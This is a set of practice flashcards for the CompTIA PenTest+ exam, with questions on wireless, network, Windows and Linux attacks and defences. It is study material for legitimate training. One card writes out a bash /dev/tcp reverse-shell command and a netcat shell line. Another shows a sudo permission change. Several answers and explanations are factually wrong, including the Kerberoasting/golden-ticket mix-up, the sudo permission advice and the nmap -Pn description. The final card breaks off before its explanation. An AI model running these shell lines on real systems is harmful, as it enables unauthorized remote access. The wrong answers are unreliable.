CompTIA PenTest+ (PT0-001) Practice Certifications Exams (Jason DIon 2 of 6) Flashcards
You are conducting a wireless penetration test against an organization. You have identified that they are using WEP encryption on their wireless access points. You are impatient and do not want to wait to collect enough packets to find a repeated initialization vector. You decide to extract part of the key material from one of the packets and use it to send an ARP request to the AP. Which of the following exploits did you utilize in this attack? A.Deuthentication attack B.Downgrade attack C.Fragmentation attack D.Karma attack
C.Fragmentation attack
Explanation:
OBJ-3.3: A fragmentation attack obtains the pseudorandom generation algorithm (PRGA) of network packets used in WEP. The PRGA can be used to craft encrypted packets that you can inject into the access point. These injected packets can speed up cracking the WEP password; otherwise, it might take a while to receive enough packets to get the repeated IV. In a fragmentation attack, you extract part of the key material from at least one packet and use this to send an ARP request to the AP. If successful, the AP responds with more of the key material in the packet echoed back to you. You repeat this process many times until around 1500 bytes of the PRGA is captured, at which point you can then use a packet crafting tool to begin the injection process.
A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system’s kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?
A.Manually review the syslog servers log’s
B.Conduct a service discovery scan on the network
C.Conduct an OS fingerprinting scan across the network
D.Conduct a packet capture of data traversing the server network
C.Conduct an OS fingerprinting scan across the network
Explanation:
OBJ-2.1: By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually review the Syslog server’s log would take too long, and would not find servers that don’t send their logs to the Syslog server. Conducting a packet capture would only allow you to find the server actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not identify which servers are running which operating systems effectively. For example, if you see that the Apache web service is running on port 80, it doesn’t indicate running Linux or Windows as the underlying server.
During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords? A.Rainbow table attack B.Brute force attack C.Cognitive password attack D.Birthday attack
C.Cognitive password attack
Explanation:
OBJ-2.4: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this password type can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publically available about Sarah Palin (like her birthday, high school, and other such information).
You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server’s backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (SELECT THREE)
A.Whitelist all specific IP blocks that use this application
B.Rename the URL to a more obscure name
C.Require two-factor authentication for access for the application
D.Conduct a penetration test against the organizations IP space
E.Change the username and default password
F.Require an alphanumeric passphrase for the applications default password
A.Whitelist all specific IP blocks that use this application
C.Require two-factor authentication for access for the application
E.Change the username and default password
Explanation
OBJ-5.3: First, you should change the username and default password since using default credentials is extremely insecure. Second, you should implement a whitelist for any specific IP blocks with access to this application’s administrative web frontend since it should only be a few system administrators and power users. Next, you should implement two-factor authentication to access the application since two-factor authentication provides more security than a simple username and password combination. You should not rename the URL to a more obscure name since security by obscurity is not considered a good security practice. You also should not require an alphanumeric passphrase for the application’s default password. Since it is a default password, you can not change the password requirements without the vendor conducting a software update to the application. Finally, while it may be a good idea to conduct a penetration test against the organization’s IP space to identify other vulnerabilities, it will not positively affect remediating this identified vulnerability.
A cybersecurity analyst conducts proactive threat hunting on a network by correlating and searching the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Query: “mimikatz” NOT “EventCode=4658” NOT “EventCode=4689” EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on? A.Processor consumption B.Unatuhorized software C.Irregular peer-to-peer communication D.Data exfiltration
B.Unatuhorized software
Explanation
OBJ-4.2: This is a difficult question, but you should see a keyword in the query, “mimikatz.” Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs, and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket, or building Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers. It is definitely considered unauthorized software and should be immediately alerted upon if discovered in your network. Data exfiltration is the process by which an attacker takes data that is stored inside of a private network and moves it to an external network. Processor consumption is an IoC that monitors the per-process percentage of CPU time to show what causes the problem. Irregular peer-to-peer communication occurs when hosts within a network establish connections over unauthorized ports or data transfers.
A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1
HTTP/1.1 200 OK Date: Sun, 12 Jun 2020 14:12:45 AST Server: Apache/2.0.46 (Unix) (Red Hat/Linux) Last-modified: Thu, 16 Apr 2009 11:20:14 PST ETgag: “1986-69b-123a4bc6” Accept-Ranges: bytes Content-Length: 6485 Connection: close Content-Type: text/html -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of action did the analyst perform, based on the command and response above? A.SQL Injection B.Banner Grabbing C.Querying the Whois database D.Cross-site scripting
B.Banner Grabbing
Explanation:
OBJ-4.2: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat, then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver. In this example, the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the server’s operating system.
You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server's logs if your organization uses the default naming convention? A.apache_log B.access_log C.httpd_log D.http_log
B.access_log
Explanation: OBJ-2.3: On Apache web servers, the logs are stored in a file named access_log. By default, the file can be located at /var/log/httpd/access_log. This file records all requests processed by the Apache server. The WebSphere Application Server uses the httpd_log file for z/OS, which is a very outdated server from the early 2000s. The http_log file is actually a header class file in C used by the Apache web server's pre-compiled code that provides the logging library but does not contain any actual logs itself. The file called apache_log is actually an executable program that parses Apache log files within in Postgres database.
What should administrators perform to reduce a system's attack surface and remove unnecessary software, services, and insecure configuration settings? A.Hardening B.Harvesting C.Stealthing D.Windowing
A.Hardening
Explanation:
OBJ-5.3: Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle, a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, removing unnecessary software, unnecessary usernames or logins, and disabling or removing unnecessary services. Windows is the use of windows for the simultaneous display of more than one item on a screen. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.
A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation? A.Service level agreement B.Memorandum of understanding C.Rules of engagement D.Acceptable use policy
C.Rules of engagement
Explanation:
OBJ-1.1: While the contract documents’ network scope will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve monetary exchange. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.
Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command? A.nmap -Pn 10.0.0.0/25 B.nmap -Pn 10.0.0.0,1.0.2.0,3.0 C.nmap -Pn 10.0.0.0/23 D.nmap -Pn 10.0.0-3.0
D.nmap -Pn 10.0.0-3.0
Explanation:
OBJ-4.1: The simplest way to scan multiple subnets adjacent to each other is to use the -Pn tells the command to conduct a host-only scan of every IP in this target space without using ping. Using the dash (-) in the IP address means to scan “this network through this network.” So, 10.0.0-3.0 will scan every IP from 10.0.0.0 through 10.0.3.255.
You are conducting a network-based exploit against a Windows-based network. After running Responder in Kali Linux for about 15 minutes, you see the following output on your screen:
To validate if your attack was successful, you also analyze a Wireshark packet capture of this attack. A portion of that Wireshark packet capture is shown here:
Based on the output and packet capture above, which of the following types of exploits did you use?
A.Pass the hash attack
B.FTP Exploit
C.LLMNR Exploit
D.DNS cache poisoning
C.LLMNR Exploit
Explanation:
OBJ-3.2: Windows computers do not rely on DNS for name resolution within the internal networks. Instead, they rely on NetBIOS Name Service (NBNS) queries. Since Windows Vista, though, NBNS queries have been replaced with the Link-Local Multicast Name Resolution (LLMNR) protocol. The Responder tool in Kali Linux is used to conduct NBNS, LLMNR, and DNS name resolution exploits. In this example, Responder is being used to answer the Windows host asking for name resolution for the system called “wpad” but provides the IP for the Kali Linux machine instead of the correct IP. The first highlighted section shows the LLMNR query for the host “wpad” being sent by the Windows 7 host and answered by the Kali host running Responder. The last highlighted section shows the Windows 7 host getting the wpad.dat file by providing their credentials to the Kali host. There are several clues in this question to the right answer. First, the question mentions that you waited 15 minutes. Within Windows networks, the older NetBIOS system, each Windows machine would send out a broadcast message with its IP and WINS name every 10-15 minutes. Some of this functionality remains within LLMNR, too. But, the easier clue to identify is from the Wireshark packet capture. It clearly shows the protocol being used in lines 1212 through 1216 as LLMNR during the query and response. For this question, I was even nice enough to highlight that portion is red, but don’t expect the exam to be nearly as kind!
You are conducting a penetration test against an organization's Windows network. You have dumped the hash of their krbtgt account from the server's memory and used it to create golden tickets. Which of the following types of privilege escalation have you performed? A.Insecure sudo B.DLL Hijacking C.cPassword extraction D.Kerboroasting
D.Kerboroasting
Explanation:
OBJ-3.5: Kerberoasting is the dumping of the hash of the krbtgt (kerberos ticket-granting ticket) from a server’s memory using a domain-based user account. This is then used to create new golden tickets that allow any domain user to request the Ticket Granting Ticket from a domain service account. This can be cracked offline to reveal the plaintext password of the account. Many Windows services run with administrative privileges, and most system administrators don’t frequently change these passwords. This can lead to an attacker gaining access to a domain for a long period of time.
You are analyzing the following network utilization report because you suspect one of the servers has been compromised.
-=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=-
IP Address Name Uptime Historical Current
192.168.20.2 web01 7D 12H 32M 06S 42.6 GB 44.1 GB
192.168.20.3 webdev02 4D 07H 12M 45S 1.95 GB 2.13 GB
192.168.20.4 dbsvr01 12D 02H 46M 14S 3.15 GB 24.6 GB
192.168.20.5 marketing01 2D 17H 18M 41S 5.2 GB 4.9 GB
-=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=-
Based on the report above, which of the following servers do you suspect has been compromised and should be investigated further? A.web01 B.webdev02 C.dbsrv01 D.marketing01
C.dbsrv01
Explanation:
OBJ-3.7: Due to the considerable increase in network utilization on dbsvr01, it should be suspected of compromise and further investigated. The server has a historical average utilization of only 3.15 GB per month, but this month there has been an increase to 24.6 GB of usage. This increase is nearly 8x more than the previous month when all of the other servers stayed relatively constant. This indicates a possible compromise of the database server (dbsvr01) and a data breach or data exfiltration.
Your company has just announced a change to an “API first” model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability?
A. Accepting serialized objects from objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
B.Lack of input validation cloud allow for a SQL attack
C.Lack of input validation could lead to a cross-site scripting attack
D. Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited
A. Accepting serialized objects from objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
Explanation:
OBJ-2.4: When implementing an API, objects in memory from one computer can be serialized and passed to another for deserialization. If the API user is malicious, they may create a fictitious object, appropriately serialize it, and then send it through the API for execution. The only model for defeating this approach is to allow the API to be exposed to trusted sources or to not serialize anything with potentially executable source code (i.e., non-primitive data types). Cross-site scripting and SQL attacks are not a concern for an API first model. While stuffiest logging and monitoring would prevent an analyst from detecting if a deserialization vulnerability was exploited, these alone would not be the basis for an attack against deserialization.
In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of? A.Use of insecure functions B.Insecure object reference C.Improper error handling D.Insufficient logging and monitoring
C.Improper error handling
Explanation:
OBJ-2.3: This is an example of an improper error handling vulnerability. A well-written application must be able to handle errors and exceptions gracefully. The main goal must be for the application not to fail and allows the attacker to execute code or perform an injection attack. One famous example of an improper error handling vulnerability is Apple’s GoTo bug, as described above. For more details on this particular vulnerability, please see CVE-2014-1266. Insecure object reference refers to when a reference to an internal implementation object, such as a file or database key, is exposed to users without any other access control. Insufficient logging and monitoring allow attackers to achieve their goals without being detected due to the lack of monitoring and timely response by defenders. The use of insecure functions occurs in the C language when legacy functions like strcpy() are used. These insecure functions can lead to buffer overflow and other exploits being successful against a program.
During your reconnaissance, you have determined that your client’s employees all use iPhones that connect back to the corporate network over a secure VPN connection. Which of the following methods would MOST likely be the best method for exploiting these?
A.Identify a jailbroken device for easy exploitation
B.Use web-based exploits against the devices web interfaces
C.USe social eningeering to trick a user into opening a malicious APK
D.Use a too like ICSSPLOIT to target specific vulnerabilities
A.Identify a jailbroken device for easy exploitation
Explanation:
OBJ-2.5: When targeting mobile devices, you must first determine if the company uses iPhones or Android-based devices. If they are using an iPhone, it becomes much more difficult to attack since iPhone users can only install trusted apps from the App Store. If the user has jailbroken their phone, they can sideload apps and other malware. After identifying a jailbroken device, you can use social engineering to trick the user into installing your malicious code and then take control of their device.
Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place? A.Social engineering B.Phishing C.Session hijacking D.Privilege escalation
D.Privilege escalation
Explanation:
OBJ-3.5: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question’s details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.
You are watching as a penetration tester is conducting an engagement against Dion Training’s network. You see the following commands and output in their terminal:
-=-=-=-=-=-=- # find / -perm +4000 -user root -type f -print /usr/sbin/exim4 /usr/bin/sudo /usr/bin/passwd /usr/games/mahjong
# chmod 4111 /usr/bin/sudo -=-=-=-=-=-=-
Which of the following vulnerabilities is the penetration tester trying to exploit? A.Unquoted service path vulnerability B.Unsecure SUDO vulnerability C.Sticky bit vulnerability D.Kernel vulnerability
B.Unsecure SUDO vulnerability
Explanation:
OBJ-3.5: This penetration tester is attempting to exploit an unsecure SUDO vulnerability. First, they ran the find command and specified that it should look for permissions that follow the numerical representation of the SUID bit permission (+4000). It also looked for any files owned by the root user and were considered regular files (f), then it displays them to the screen. There were 4 files found in this example, one of which was the /usr/bin/sudo file. Next, the penetration tester attempted to perform a chmod against the /usr/bin/sudo file and set its permissions to 4111. If they were successful, this would change the permissions to allow the user, the group, and everyone else on this computer to execute the sudo command. When the sudo command is run, because it has the SUID bit set, the user can run the command as the root user. For this reason, the /usr/bin/sudo should have its permissions set to 4411 and not 4111.
The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant’s security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems?
A.Automated patch deployment
B.Log consolidation
C.Intrusion prevention system
D.Anti-virus software
C.Intrusion prevention system
Explanation:
OBJ-2.5: Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment and to prevent malicious activity. You could set up strict IPS rules to prevent unknown types of actions from being allowed to occur. Log consolidation is a good idea, but it won’t prevent an issue and therefore isn’t the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before conducting any patches. Often, patches will break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.
What role does the red team perform during a tabletop exercise (TTX)? A.Adversary B.Cybersecurity analyst C.System Administrator D.Network defender
A.Adversary
Explanation:
OBJ-1.3: The red team acts as the adversary, attempting to penetrate the network or exploit it as a rogue internal attacker. The red team might be selected members of in-house security staff, a third-party company, or a consultant contracted to perform the role. The blue team operates the security system with a focus on detecting and repelling the red team. The blue team usually consists of system administrators, cybersecurity analysts, and network defenders.
You are working as a server administrator at Dion Training. You unlock the server room door using your proximity badge and walk through the door. Before the door shuts, another person walks in behind you. What social engineering technique did this person utilize? A.Spoofing B.Tailgating C.Shoulder surfing D.Impersonation
B.Tailgating
Explanation:
OBJ-3.6: Tailgating (or piggybacking) is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. This might be done without the target’s knowledge or might be a means for an insider to allow access to someone without recording it in the building’s entry log. Another technique is to persuade someone to hold a door open for them.
You are attempting to exploit a network-based vulnerability against a Windows server. You configure Metasploit with the following options below and enter the run command.
Which of the following types of exploits are you attempting?
A.Credential brute forcing
B.Sandbox escape
C.Pass the hash
D.Credentials harvesting
C.Pass the hash
Explanation:
OBJ-4.3: A pass the hash attacks is a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on. When authenticating with a username and password, the password is hashed once you type it in. Therefore, the computer doesn’t recognize a difference between the password and the hash itself. So, if you use psexec to send the hash to the system directly, it can be used to authenticate you as that user without actually knowing the user’s password. The key to answering this question is identifying that the smbpass parameter is being set to a password hash of a specified user.
A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first?
A.HArdening the DEV_SERVER7 server
B.Logically isolate the PAYROLL_DB server from the production network
C.Conduct a Nessus scan of the FIREFLY server
D.Conduct a data criticality and prioritization analysis
D.Conduct a data criticality and prioritization analysis
Explanation:
OBJ-2.3: While the payroll server could be assumed to holds PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and Dion, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn’t contain their credit card processing systems that would be a more lucrative target for APT 38 than the PAYROLL_DB. The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don’t know which data they should focus on protecting or where the attacker is currently.
What should be done NEXT if the final set of security controls does not eliminate all of the risks in a given system?
A.You should accept the risk if the residual risk is low enough
B.You should ignore any remaining risk
C.You should continue to apply additional controls until there is zero risk
D.You should remove the current controls since they are not completely effective
A.You should accept the risk if the residual risk is low enough
Explanation:
OBJ-1.3: In most cases, you will be unable to remove all risk. Instead, it would be best to mitigate the risk to a low enough level to accept the residual risk. Removing the controls would add to the risk, which is a bad course of action to select. Ignoring the remaining risk is unacceptable; instead, you should acknowledge what risk remains and accept it if it is low enough. If it is not low enough, you should continue to mitigate the risk by adding additional control measures. It is unlikely you will ever be able to get all risk down to zero, but mitigating to a lower level and then accepting the residual risk is a common industry practice.
Rick is upset that he was passed over for a promotion. He decides to take revenge on his nemesis, Mary, who got the job instead of him. Rick sets up a man-in-the-middle attack against Mary's computer by redirecting any layer 2 traffic destined for the gateway to his own computer first. Rick is careful only to affect the traffic associated with Mary's computer and not the entire network. Which type of man-in-the-middle attack is Rick conducting against Mary? A.Evil twin B.IP Spoofing C.ARP cache poisoning D.MAC Spoofing
C.ARP cache poisoning
Explanation:
OBJ-3.2: Based on the scenario, we can eliminate evil twin (focused on wireless access points) and IP spoofing (since this affects layer 3 traffic). While MAC spoofing the gateway’s address might work, it would also affect every computer on this subnet. By conducting an ARP cache poisoning attack, Rick can poison the cache and replace Mary’s computer’s MAC association with his own, allowing him to become the man-in-the-middle between Mary and the default gateway.
What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?
A.A stealth scan that scans ports 80 and 443
B.A stealth scan that scans all open ports excluding ports 80 to 443
C.A stealth scan that scans all ports from 80 to 443 and determines a targets operating system
D.A stealth scan that scans ports 80 to 443
C.A stealth scan that scans all ports from 80 to 443 and determines a targets operating system
Explanation:
OBJ-4.1: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.
A penetration tester just entered the following command into a Bash shell on Dion Training’s server:
-=-=-=-=-=-
bash 1>& /dev/tcp/192.168.1.53/31337 0>&1
-=-=-=-=-=-
Before the penetration tester runs that command, what must they run first on their machine? A.nc -nlvp 31337 B.nc 192.168.1.53 31337 C.bash 0>& /dev/tcp/127.0.0.1/31337 1>&0 D.nc -e /bin/sh 192.168.1.53 31337
A.nc -nlvp 31337
Explanation:
OBJ-4.3: The bash command entered by the penetration tester on the Dion Training server is a redirector to send information back to a listener. Therefore, the penetration tester needs to first set up a listener on their own machine. This can quickly be done using netcat to set up a listener on port 31337 (nc -nvlp 31337). The bash command says to redirect the standard output (0) to a TCP socket connected to the IP (192.168.1.53) over port 31337. Then, the standard input (0) is redirected to the standard output (1). Since Bash treats TCP sockets established using this command as a two-way connection, it allows the penetration tester to gain a remote connection to the server by creating a reverse shell. To maintain persistence, the server could be configured using crontab to run this Bash command every day at a certain time, as well.
Which of the following vulnerabilities is the greatest threat to data confidentiality?
A.SSL Server with SSLv3 enabled vulnerability
B.HTTP TRACE/TRACK methods enabled
C.phpinfo information about disclosure vulnerability
D.Web application SQL injection vulnerability
D.Web application SQL injection vulnerability
Explanation:
OBJ-5.1: Each vulnerability mentioned poses a significant risk, but the greatest threat comes from the SQL injection. An SQL injection could allow an attacker to retrieve our data from the backend database directly. Using this technique, the attacker could also alter the data and put it back, and nobody would notice everything that had been changed, thereby also affecting our data integrity. The HTTP TRACE/TRACK methods are normally used to return the full HTTP request to the requesting client for proxy-debugging purposes and allow the attacker to access sensitive information in the HTTP headers. Since this only exposes information in the headers, it minimizes the risk to our system’s data confidentiality. An SSL server with SSLv3 enabled is not ideal since this is an older encryption type, but it still provides some confidentiality. The phpinfo information disclosure vulnerability prints out detailed information on both the system and the PHP configuration. This information by itself doesn’t disclose any information about the data stored within the system, though, so it isn’t a great threat to our data’s confidentiality.
What tool is used to collect wireless packet data?
A.Netcat
B.John The Ripper
C.Aircrack-ng
D.Nessus
C.Aircrack-ng
Explanation:
OBJ-4.2: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.
Dion Consulting Group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer’s team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend they implement first?
A.Ensure that all games for the console are distributed as encrypted so that theycan only be decrypted on the game console
B.Ensure that all each individual console has its own unqiue key for decrypting individual licenses and tracking which console has purchased which game
C.Ensure that all screen capture content is visibility watermarked
D.Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute
B.Ensure that all each individual console has its own unqiue key for decrypting individual licenses and tracking which console has purchased which game
Explanation: OBJ-5.3: Ensuring that each console has its own unique key will allow the console manufacturer to track who has purchased which games when using digital rights management licensing. This can be achieved using a hardware root of trust, such as a TPM module in the processor. While encrypting the games during distribution will provide some security, the games could be decrypted and distributed by unauthorized parties if the encryption key were ever compromised. The recommendation of making the game arbitrarily large will frustrate both authorized and unauthorized, which could negatively impact sales, so it is a poor recommendation to implement. Visibly watermarking everything will only aggravate the user, provide a negative customer experience, and not help fight software piracy.
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO) A.Patching B.NIDS C.Disabling unused services D.Segmentation
C.Disabling unused services
D.Segmentation
Explanation:
OBJ-2.5: Segmentation is the best method to reduce the risk to an embedded ICS system from a network-based compromise. Additionally, you could disable unused services to reduce the footprint of the embedded ICS. Many of these embedded ICS systems have a large number of default services running. So, by disabling the unused services, we can better secure these devices. By segmenting the devices off the main portion of the network, we can also better protect them. A NIDS might detect an attack or compromise, but it would not reduce the risk of the attack succeeding since it can only detect it. Patching is difficult for embedded ICS devices since they usually rely on customized software applications that rarely provide updates.
During a vulnerability scan of your network, you identified a vulnerability on an appliance installed by a vendor on your network under an ongoing service contract. You do not have access to the appliance’s operating system as the device was installed under a support agreement with the vendor. What is your best course of action to remediate or mitigate this vulnerability?
A.Mark the identified vulnerability as a false positive
B.Try to gain access to the underlying operating system and install the patch
C.Wait 30 days, run the scan again, and determine if the vendor corrected the vulnerability
D.Contact the vendor to provide an update or to remediate the vulnerability
D.Contact the vendor to provide an update or to remediate the vulnerability
Explanation:
OBJ-5.3: You should contact the vendor to determine if a patch is available for installation. Since this is a vendor-supported appliance installed under a service contract, the vendor is responsible for the appliance’s management and security. You should not attempt to gain access to the underlying operating system to patch the vulnerability yourself, as this could void your warranty and void your service contract. Based on the information provided, there is no reason to believe that this is a false positive, either. You should not simply wait 30 days and rerun the scan, as this is a non-action. Instead, you should contact the vendor to fix this vulnerability. Then, you could rerun the scan to validate they have completed the mitigations and remediations.
A project lead reviews the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organization’s internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The work statement specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indicating weaknesses in the infrastructure. Based on this scope of work, what type of activity is to be performed? A.Vulnerability scanning B.Social Engineering C.Penetration testing D.Session hijacking
C.Penetration testing
Explanation:
OBJ-1.3: Penetration testing is the act of using a computer system, an individual network, or another application to find vulnerabilities that an attacker could use to compromise your systems. Penetration testing can also find endpoints with vulnerabilities, which makes the attack surface greater.
Dion Training is hiring a penetration testing firm to conduct an assessment of its corporate network. As part of the contract, the company has specified that it will not provide any network details to the penetration testing firm. Instead, the company wants to see how much information about the network can be found by the penetration testers using open-source research and scanning the corporate network. What type of assessment is this considered? A.White Box B.Red Box C.Black Box D.Gray Box
C.Black Box
Explanation:
OBJ-1.3: In a black box assessment, the penetration tester takes an average hacker’s role with no internal knowledge of the target system. Testers are not provided with any architecture diagrams or source code that is not publicly available. A black-box penetration test determines the vulnerabilities in a system that are exploitable from outside the network.
You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and impacts the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why? A.Syslog B.Network Mapping C.Firewall Logs D.NIDS
A.Syslog
Explanation:
OBJ-2.2: The Syslog server is a centralized log management solution. By looking through the Syslog server’s logs, the technician could determine which service failed on which server since all the logs are retained on the Syslog server from all of the network devices and servers. Network mapping is conducted using active and passive scanning techniques and could help determine which server was offline, but not what caused the interruption. Firewall logs would only help determine why the network connectivity between a host and destination may have been disrupted. A network intrusion detection system (NIDS) is used to detect hacking activities, denial of service attacks, and port scans on a computer network. It is unlikely to provide the details needed to identify why the network service was interrupted.
You are conducting a penetration test against the Dion Training test server. You have just run nikto against the server and received the results below:
-=-=-=-=-=-
root@DionTraining:~# nikto -h test.diontraining.com
- Nikto v2.1.6
—————————————————————————
+ Target IP: 164.201.54.34
+ Target Hostname: test.diontraining.com
+ Target Port: 80
+ Start Time: 2020-12-22 13:43:13 (GMT-5)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2c39 0x53a938fc104ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header ‘x-ob_mode’ found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7596 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016-08-22 06:54:44 (GMT8) (1291 seconds)
—————————————————————————
+ 1 host(s) tested
-=-=-=-=-=-
Based on the results above, which of the following exploits should develop for this engagement? A.Arbitray Code Execution B.Privilege Escalation C.SQL Injection D.Clickjacking
D.Clickjacking
Explanation
